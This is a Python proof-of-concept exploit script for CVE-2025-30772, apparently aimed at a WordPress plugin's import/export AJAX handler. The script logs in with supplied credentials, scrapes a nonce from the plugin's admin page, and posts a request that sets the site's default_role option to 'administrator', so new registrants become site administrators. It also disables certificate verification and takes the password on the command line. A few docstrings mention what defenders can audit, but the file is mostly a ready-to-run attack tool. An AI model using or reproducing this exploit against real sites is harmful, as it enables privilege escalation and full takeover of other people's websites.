POC / CVE-2025-30772.py PY
import requests
import argparse
import re
import sys



#by Nxploited | Khaled Alenazi,

# Silence urllib3 warnings process-wide. This includes the InsecureRequestWarning
# that would otherwise be emitted on every request, because create_session()
# turns certificate verification off.
requests.packages.urllib3.disable_warnings()

def create_session():
    """Return the HTTP session shared by every request this script makes.

    Returns:
        A ``requests.Session`` with ``verify`` set to ``False``.
    """
    http = requests.Session()
    # Certificate validation is off for the whole session: the server's
    # identity is not checked, so the credentials sent by authenticate() and
    # every response read later are exposed to anyone able to intercept the
    # connection.
    http.verify = False
    return http

def authenticate(session, base_url, username, password):
    """Log in through wp-login.php so the session holds WordPress auth cookies.

    Args:
        session: HTTP session; its cookie jar is inspected after the POST.
        base_url: Site root, concatenated as-is with ``/wp-login.php``.
        username: WordPress account name, sent as the ``log`` field.
        password: Account password, sent as the ``pwd`` field.

    Exits the process with ``[!] Login failed.`` when no cookie whose name
    contains ``wordpress_logged_in`` is present after the request.
    """
    form = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }
    session.post(
        f"{base_url}/wp-login.php",
        data=form,
        headers={'User-Agent': 'Mozilla/5.0'},
    )

    # Success is judged from the cookie jar only; the HTTP status and body of
    # the login response are never looked at.
    logged_in = False
    for cookie in session.cookies:
        if 'wordpress_logged_in' in cookie.name:
            logged_in = True
            break

    if not logged_in:
        sys.exit("[!] Login failed.")
    print("[+] Authenticated")

def extract_nonce(session, base_url):
    """Fetch the plugin's admin page and return the nonce embedded in it.

    Args:
        session: Authenticated HTTP session used for the GET.
        base_url: Site root, concatenated as-is with the admin page path.

    Returns:
        The first value matched by ``"nonce":"..."`` in the page body.

    Exits the process with ``[!] Nonce not found.`` when the pattern is absent.
    """
    html = session.get(
        f"{base_url}/wp-admin/admin.php?page=wpclever-wpcuf&tab=uf"
    ).text

    # First occurrence wins. The pattern is not tied to this plugin's own
    # script block, so any earlier "nonce" key in the page would be picked up.
    found = re.search(r'"nonce":"(.*?)"', html)
    if found is None:
        sys.exit("[!] Nonce not found.")

    nonce = found.group(1)
    print(f"[+] Nonce: {nonce}")
    return nonce

def send_exploit(session, base_url, nonce):
    """POST the import/export save action and report the outcome on stdout.

    The request goes to ``admin-ajax.php`` with ``action`` set to
    ``wpcuf_import_export_save``, ``name`` set to ``default_role`` and
    ``rules`` set to ``"administrator"``. The server-side handler is not
    shown here; from the field names it presumably stores ``rules`` under
    the WordPress option called ``name``, which would make ``administrator``
    the role given to newly registered accounts (to be confirmed against the
    plugin code).

    For defenders, the request fields to look for are that ``action`` value
    combined with ``name=default_role``. The state to audit afterwards is the
    site's default role for new users and any unexpected administrator
    accounts.

    Args:
        session: Authenticated HTTP session used for the POST.
        base_url: Site root, concatenated as-is with the AJAX endpoint path.
        nonce: Nonce value obtained from the plugin's admin page.
    """
    form = {
        'action': 'wpcuf_import_export_save',
        'name': 'default_role',
        'rules': '"administrator"',
        'nonce': nonce
    }
    reply = session.post(
        f"{base_url}/wp-admin/admin-ajax.php",
        data=form,
        headers={'Content-Type': 'application/x-www-form-urlencoded'},
    )

    # The only success signal is the literal "Done!" in the response body.
    # The option value is never read back to confirm it changed.
    body = reply.text
    if "Done!" not in body:
        print("[!] Exploit failed")
        print(body)
        return
    print("[+] Exploit executed successfully")

def main():
    """Parse the command line and run login, nonce lookup and the POST in order.

    All three options are required. The password is taken as a plain
    command-line argument, so it is visible in the process list and is
    usually saved in shell history.
    """
    cli = argparse.ArgumentParser(description="WordPress Privilege Escalation Exploit - CVE-2025-30772 # By Nxploited | Khaled ALenazi,")
    for short_flag, long_flag, help_text in (
        ("-u", "--url", "Target base URL"),
        ("-un", "--username", "WordPress username"),
        ("-p", "--password", "WordPress password"),
    ):
        cli.add_argument(short_flag, long_flag, required=True, help=help_text)
    opts = cli.parse_args()

    # Each step calls sys.exit() on failure, so a later step only runs when
    # the earlier ones succeeded.
    http = create_session()
    authenticate(http, opts.url, opts.username, opts.password)
    token = extract_nonce(http, opts.url)
    send_exploit(http, opts.url, token)

# Run the command-line flow only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()